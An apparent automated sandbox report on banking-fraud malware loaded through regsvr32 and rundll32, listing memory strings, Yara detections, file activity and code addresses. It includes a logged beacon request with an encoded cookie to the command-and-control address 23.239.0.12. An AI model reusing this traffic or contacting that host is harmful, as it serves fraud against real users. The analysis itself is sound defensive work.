                      Source: svchost.exe, 0000000D.00000003.317124705.00000243CC447000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.317526098.00000243CC44E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000D.00000002.317537582.00000243CC45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317096728.00000243CC459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000D.00000002.317469413.00000243CC43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317141842.00000243CC441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.317475430.00000243CC442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317141842.00000243CC441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.317475430.00000243CC442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000D.00000002.317537582.00000243CC45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317096728.00000243CC459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000001C.00000003.513071382.000001F509775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000D.00000003.317086705.00000243CC45E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000D.00000002.317537582.00000243CC45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317096728.00000243CC459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000D.00000002.317537582.00000243CC45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317096728.00000243CC459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000D.00000002.317542755.00000243CC462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000D.00000002.317469413.00000243CC43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000D.00000003.295407264.00000243CC432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000001C.00000003.507378636.000001F509C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507537378.000001F509C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507451898.000001F509C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507505148.000001F50979F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.508895507.000001F509775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507491854.000001F50978E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000000D.00000002.317469413.00000243CC43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000D.00000002.317469413.00000243CC43D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.317375524.00000243CC413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000D.00000003.317136899.00000243CC445000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000D.00000003.317136899.00000243CC445000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000D.00000002.317464357.00000243CC43B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.295407264.00000243CC432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000D.00000003.317124705.00000243CC447000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.317526098.00000243CC44E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317108861.00000243CC440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 0000001C.00000003.513071382.000001F509775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001C.00000003.513071382.000001F509775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001C.00000003.507378636.000001F509C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507537378.000001F509C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507451898.000001F509C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507505148.000001F50979F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.508895507.000001F509775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507491854.000001F50978E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 0000001C.00000003.507378636.000001F509C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507537378.000001F509C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507451898.000001F509C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507505148.000001F50979F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.508895507.000001F509775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.507491854.000001F50978E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 0000001C.00000003.517705075.000001F509775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                      Source: svchost.exe, 0000001C.00000003.516238842.000001F509C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.516180464.000001F5097B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.516163337.000001F5097B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.517705075.000001F509775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.516211178.000001F50979A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,6_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: hIRJjqHMHdV=nZwxi8WPWIMXNXTCUv3V5ewCiVaqak0UnFrOh9HPxFaBO28go/9+xWRpiaD+OvdLdpaS3KmMe0NROXF7P/v2uFUR2mdZcEYfCsU7esjRj8UoaBpR90xnOAMLNZb4Zf/GkJR+k0zKRYQ4snDyWIl1vlaP/fyz8s1xkPFTUva4UqN6kwBO8dE+yFUfheBRQWksHoH2WbfRu/bRMIQmJ6ipsT+oAAYPWV1JFEYVPpdNR6o=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49763 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.20701410000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.22e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.22e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.20701410000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.23396dc0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.23396dc0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.649155251.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.265168643.0000023396DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.264939318.0000020701410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.266871028.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\TvcDyJjJQ\NcAvRfvDRbwLFn.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\TvcDyJjJQ\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE2316F0C2_2_00007FFFE2316F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231E6C02_2_00007FFFE231E6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231EB602_2_00007FFFE231EB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231FB6C2_2_00007FFFE231FB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231AF702_2_00007FFFE231AF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231A77C2_2_00007FFFE231A77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231FCA02_2_00007FFFE231FCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE23159442_2_00007FFFE2315944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231895C2_2_00007FFFE231895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231AA0C2_2_00007FFFE231AA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231B5CC2_2_00007FFFE231B5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_022D00002_2_022D0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF42_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C202_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C0582_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800091002_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800079582_2_0000000180007958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C6082_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800216182_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E282_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE82_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800220102_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800118342_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800238312_2_0000000180023831
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC482_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC482_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800064582_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4602_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800298882_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA02_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A82_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB02_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B42_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B42_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800288B82_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024B82_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D8C42_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800250CC2_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D42_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017CE42_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800264F02_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800014F82_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020CFC2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C9042_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800179082_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800215102_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9172_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F1282_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD382_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F9442_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181482_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D9502_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800131502_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED502_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9602_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D602_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C9642_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D682_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D702_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800021782_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D802_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185982_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800035982_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A82_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A82_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B02_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B82_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C02_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C42_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D42_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E82_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800026102_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196182_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA382_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A2702_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E782_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA802_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800246982_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE982_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B82_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB82_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD02_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD82_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F02_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193002_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB042_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B102_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B282_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F282_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB282_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB302_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800203342_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800107582_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800293682_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800207682_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173782_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800137802_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800153882_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800027902_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A02_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B42_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB42_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C02_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C02_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D82_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E02_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE02_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010FF43_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C0583_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800091003_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C6083_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800216183_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E3AC3_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DBE83_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FC0C3_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000580C3_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800220103_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001481C3_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A42C3_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800118343_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021C3C3_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000703C3_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000AC483_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000FC483_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800064583_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C05C3_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001A4603_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800298883_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D49C3_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008CA03_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800248A83_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015CB03_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800124B43_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C4B43_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800288B83_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024B83_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000D8C43_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800250CC3_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800190D43_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017CE43_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800264F03_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800014F83_2_00000001800014F8
